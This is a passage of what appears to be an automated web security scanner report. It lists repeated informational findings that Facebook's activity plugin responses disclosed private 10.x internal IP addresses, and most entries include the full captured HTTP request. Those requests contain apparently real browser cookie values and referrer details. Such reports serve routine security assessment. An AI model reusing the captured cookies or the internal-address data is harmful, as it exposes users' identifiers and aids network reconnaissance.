User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.291. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.246.69

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.292. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.97.77

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.293. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.149.35

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

20.294. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.201.43

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.295. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.155.32

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.296. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.106.131

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.297. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.65.49

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.298. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.179.40

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.299. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.188.79

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

20.300. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.251.24

Request

Response

20.301. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.94.59

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.302. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.193.40

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.303. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.163.33

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.304. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.190.43

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.305. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.91.39

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.306. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.79.83

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.307. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.201.60

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.308. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.148.130

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.309. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.74.47

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.310. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.126.109

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.311. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.198.64

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.312. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.121.127

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

20.313. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.136.118

Request

